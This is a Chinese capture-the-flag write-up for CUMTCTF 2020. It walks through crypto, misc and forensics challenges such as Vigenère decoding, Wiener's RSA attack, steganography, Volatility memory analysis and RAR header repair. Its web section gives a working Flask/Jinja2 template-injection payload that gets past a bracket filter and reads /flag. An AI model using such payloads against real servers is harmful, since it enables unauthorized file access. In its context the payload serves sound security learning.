CUMTCTF2020-10.20WP

一.Crypto

1.Classical

密文:Elxyi lrw fqfjyxl pr wixx yajy chb qtsk lqfjzrx zs xuua vafe chb nfsl pcgy es ipgv tzxo ywzq rvyc djxcfx lrw oyr tzxo ytc vxhp! Orwto pmlx rvy hafm vh icitt;kz wzxtx dzy phre tg zq;uj hlta czu otpm yz fx,iinamlg rtf ltci zndr qgj wmyl eyd ggg vmlrvl xz dg tne ysi momygk rqn blrm as oo.Eta rtf ltci pngnia mltiprpsk mq ffvi rvy dwwxv,xszyzo xciseu mt xedl czu kmthsr,igvyrh khtkth xh ripp qhw azxeg,lrzuya jhup xh teve qhw afatr? Hphaql rny jsnywplx bp hysikz’wsowl.Ky dzy yliw tztv by sykaw jom,bv iwzftipj hmkvl ysi halpr hxtlty, xhv.Xse ztrinpwm vj aeginx izr’m uineklcknwc ahzp tzx dxxe sy lzprqmjbsr;xalc uukm otpp xal qzsl hh xapvraltny mjty nsflw llggi mmpmk dej.Hsirbspwl smps xht mmzwx dlz cjr,vatdi pos sujm, vatdi pos sanx uxfcgalh,lnv mjhxp aav llvw mtbjo,jhy sylq mjxd neg htarwvktyp xal mxpgkvtsni hm tpoheg.pmz ltci eomvjxi elxpv winxu.Etgi ulktnk pkmm l wfppp,gjhyl btxa h otsk tpw jyhl dmeh s mgtw.Elx ivtgzmgly qymbvp waen tqherz fp bslgw ty e yvvrolmgg ulwm, fsf csg’v zt zr plpw if ekyjfrmpp jom egm lz sy fsfr htum klmebvps sgf ajlvmhgsek.Tpw ny xal iyd, A to zqlh mv xpld rqn ysi VBQECLY kl JynhfXseNbixspvxJmahwk.Dr ysi phc, ceexoujc xh bwp bjtexx miyvvp smuobyemgn.

https://guballa.de/vigenere-solver分析后得到flag。

在这里插入图片描述

2.ezRSA

n: 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e: 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
c: 235079473042454099807116076488262740135383858230967099540307826273199444131724945298259060669497025680602868465015609167157760611830665379910856647739895018654389167886359502125262006498872925841789249028759026079722290718145036644959479543255350040619949567107916725017078853648984759794085772688267388901151

维尔纳攻击,分解n,利用脚本跑出来得到flag

二.Misc

1.Sign in

在这里插入图片描述
看到密文后面的==想到base64。

在这里插入图片描述
再在线解密brainfuck密码得到flag。

2.出个流量分析吧

提示了要用到wireshark,将文件直接拖入wireshark界面内,过滤http contains flag(现在暂时还不明白原理)

在这里插入图片描述
得到一个字符串ZmxhZ3tXaXJSU2hhcktfUzBfRTQ1eX0=
显然是base64,解码得 flag

3.出个LSB吧

下载后将图片用stegsolve打开,在analyse中打开data extract

在这里插入图片描述
处理后得到一个二维码

在这里插入图片描述
扫码得flag

4.出个伪web吧

下载后解压找到一个修改日期与其他文件不同的include.php

在这里插入图片描述

vscode打开后查找flag没结果后,查找cumt得到flag

在这里插入图片描述

5.出个文档吧

在这里插入图片描述
检查文档发现有隐藏文字

在这里插入图片描述
Ctrl+A全选点击字体,勾取消掉隐藏选项

在这里插入图片描述
此时flag已经显示出来了
在这里插入图片描述

6.出个内存取证吧

打开volitility分析镜像。

在这里插入图片描述
猜测profile值为Win2003SPIx86。

查看进程。

在这里插入图片描述
发现了一个DumpIT.exe。

在这里插入图片描述
查看之前运行过的进程。

在这里插入图片描述
提取explore.exe进程。

在这里插入图片描述
得到1992.dump文件,然后提取。

在这里插入图片描述
找到了四个图片。

在这里插入图片描述
扫描第一个二维码得到明文:jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=

第二个图片看出是ASE加密。

在这里插入图片描述
在线解密:http://tool.chacuo.net/cryptaes/

在这里插入图片描述
得到flag

7.出个压缩包吧

用010editor打开flag.rar,发现里面有个secret.png。将7A改为74(注意要选中7A两个字符然后再改)。

在这里插入图片描述
保存后解压flag.rar,发现secret.png出现了,继续用010editor打开,看它的头标识是 47 49 46 38 39(37) 61,确定是一张gif图片。

在这里插入图片描述
改完后缀后用GifSplitter分离,有两帧。

在这里插入图片描述

分别用stegsolve打开,切换通道得到两张二维码。

在这里插入图片描述

在这里插入图片描述

将两张图拼在一起得到完整的二维码。

在这里插入图片描述

扫码得flag。

在这里插入图片描述

三.Web

1.babyflask

模板注入url+{{7*7}}

在这里插入图片描述
页面显示404报错,并且显示的是url+49,确定是模板注入。
{{’’. __class__.__mro__[2].__subclasses__()}}
查看模块时发现存在waf,经测试发现过滤了[],于是
{{’’.__class__.__mro__.__getitem__(2).__subclasses__()}}

在这里插入图片描述

存在file模块,用read读取文件内容
{{’’.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)(’/flag’).read()}}
得到flag

在这里插入图片描述

2.doge

抽奖抽到第五次的时候出来了。。。

在这里插入图片描述

base64转码得flag。


版权声明:本文为weixin_45982862原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。